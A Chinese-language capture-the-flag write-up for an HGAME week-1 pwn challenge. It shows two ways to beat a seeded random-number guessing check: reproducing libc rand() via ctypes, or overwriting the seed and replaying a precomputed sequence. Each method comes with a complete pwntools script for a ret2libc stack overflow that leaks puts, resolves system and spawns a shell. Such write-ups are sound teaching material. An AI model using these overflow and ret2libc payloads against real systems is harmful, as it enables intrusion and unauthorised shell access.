在hgameweek1中遇到一道有关随机数的栈题,之前也没有做过这类题型,今天就通过这一道题简单讲一下它的两个解决方法吧。
先看一下代码
首先看到seed和srand,不认识,百度之后是产生随机数的函数
seed( ) 用于指定随机数生成时所用算法开始的整数值,如果使用相同的seed( )值,则每次生成的随机数都相同。
这里指定的值为time0,while循环生成99个随机数并将其对100求余数后加一,我们需要每次都输入与程序产生的数字相同的数才能通过if语句,进入myread函数进行栈溢出,所以我们需要得出系统产生的随机数的值。第一种方法正如上面所说,如果使用相同的seed( )值,则每次生成的随机数都相同。
我们可以导入调用ctypes库中的cdll.Loadlibrary('libc.so,6')创建一个CDLL对象,在通过对象调用srand(time(0)),循环99次调用elf.rand()
from pwn import*
import ctypes
context(os='linux', arch='amd64', log_level='debug')
p=process('./pwn4')
elf=ELF('./pwn4')
libc=ELF('./libc.so.6')
def bug():
gdb.attach(p)
pause()
rdi=0x0000000000401423
read=0x40125d
p.recvuntil(b'Menlina: Well tarnished, tell me thy name.')
payload=b'\x00'*10+b'a'*4+p32(1)
#bug()
p.send(payload)
elf1=ctypes.CDLL("libc.so.6")
elf1.srand(1)
for i in range(99):
payload = p32(elf1.rand()%100+1)
p.recvuntil(b'Please guess the number:\n')
p.send(payload)
p.recvuntil(b"Here's a reward to thy brilliant mind.")
payload=b'a'*(0x30+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
p.sendline(payload)
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print(hex(libc_base))
system = libc_base + libc.symbols['system']
binsh = libc_base +next(libc.search(b'/bin/sh'))
payload=b'a'*(0x30+8)+p64(rdi)+p64(binsh)+p64(rdi+1)+p64(system)
p.sendline(payload)
p.interactive()
这里可能需要多运行几次才能成功。
第二种方法是将seed里的参数覆盖成我们指定的参数0,1,2。。。。。。然后我们可以通过写c语音程序打印出其对应的随机数顺序,依次传入
from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn4")
libc=ELF("./libc.so.6")
elf=ELF("./pwn4")
def bug():
gdb.attach(p)
pause()
rdi=0x0000000000401423
read=0x40125D
a=[84,87,78,16,94,36,87,93,50,22,63,28,91,60,64,27,41,27,73,37,12,69,68,30,83,31,63,24,68,36,30,3,23,59,70,68,94,57,12,43,30,74,22,20,85,38,99,25,16,71,14,27,92,81,57,74,63,71,97,82,6,26,85,28,37,6,47,30,14,58,25,96,83,46,15,68,35,65,44,51,88,9,77,79,89,85,4,52,55,100,33,61,77,69,40,13,27,87,95]
p.recvuntil("Menlina: Well tarnished, tell me thy name.")
pay=b'\x00'*(0x12)
p.send(pay)
#bug()
for i in range(len(a)):
p.recvuntil("Please guess the number:\n")
p.send(p32(a[i]))
p.recvuntil("Here's a reward to thy brilliant mind.")
payload1=b'a'*(0x30+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
p.sendline(payload1)
libc_base =u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
payload2=b'a'*(0x30+8)+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
p.sendline(payload2)
p.interactive()
成功攻破随机数之后就是一道简单的libc类型题了,这里就不过多去说了。